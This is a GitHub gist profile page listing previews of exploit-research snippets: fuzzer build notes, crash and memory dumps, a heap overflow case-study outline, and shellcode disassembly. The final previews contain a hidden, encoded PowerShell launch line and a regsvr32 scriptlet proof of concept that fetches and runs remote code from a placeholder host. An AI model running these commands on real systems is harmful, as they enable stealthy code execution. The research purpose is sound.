SkyBulk SkyBulk

Block or report user

Report or block SkyBulk

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View crash
how it was compiled
git clone https://github.com/googleprojectzero/winafl.git
git submodule update --init --recursive
mkdir build32
cd build32
cmake .. -DDynamoRIO_DIR=C:\Users\blackleitus\Desktop\DynamoRIO-Windows-7.1.0-1\cmake -DINTELPT=1
cmake --build . --config Release
# crash at the moment of running this command
View project.py
AutoComplete
class AutoComplete() :3
def __init__() :5
def complete() :8
def complete() :20
commands
View cap.py
from capstone import *
# Capstone's disasm() expects a bytes object, so the buffer is built from bytes literals
shellcode = b"\x00\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += b"\x01\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += b"\x02\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += b"\x03\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += b"\x04\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += b"\x05\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += b"\x06\x48\x8B\x01\xC3\xC3\xC3\xC3"
shellcode += b"\x07\x48\x8B\x01\xC3\xC3\xC3\xC3"
View ie
0:005> r
eax=00000000 ebx=008adff0 ecx=008f00a7 edx=00000000 esi=02d8bb70 edi=00000000
eip=7157b68f esp=02d8bb44 ebp=02d8bb5c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
mshtml!CElement::Doc+0x2:
7157b68f 8b5070 mov edx,dword ptr [eax+70h] ds:002b:00000070=????????
0:005> u mshtml!CElement::Doc
mshtml!CElement::Doc:
7157b68d 8b01 mov eax,dword ptr [ecx]
View awe
Heap Overflow Case Study: CVE-2015-3104 Proof of Concept
Heap Overflow Case Study: A Deeper Look at the Bug
Heap Overflow Case Study: Allocation Control.
Heap Overflow Case Study: Gaining Read/Write Access to the Memory Space
Heap Overflow Case Study: Defeating ASLR
Heap Overflow Case Study: Gaining code execution
Heap Overflow Case Study: Stack Pivoting
Heap Overflow Case Study: Defeating DEP
Executing Shellcode and Restoring the execution flow
Sandbox Escape
View gist:7a969e8854730d90f0c91929e41dc87f
Table of Contents
0. Testing Environment
0.1 Testing Environment
1. Software Vulnerability Review
View memory map
0141E388 41414141 AAAA `<----------- ESP starts here`
0141E38C 41414141 AAAA
0141E390 41414141 AAAA
0141E394 41414141 AAAA
0141E398 41414141 AAAA
0141E39C 41414141 AAAA
0141E3A0 41414141 AAAA
0141E3A4 41414141 AAAA
0141E3A8 41414141 AAAA
View info.ps1
powershell.exe -NoP -sta -NonI -W hidden -Enc QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBJACAAYQBtACAAYgBlAGkAbgBnACAAZQB4AGUAYwB1AHQAZQBkACAAZgByAG8AbQAgAHQAaABlACAAbQBlAG0AbwByAHkAIABkAHUAaAAgACEAIQAnACkA
View RegSvr32.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please note, the file extension does not matter -->
<!-- Though, the name and extension are arbitrary.. -->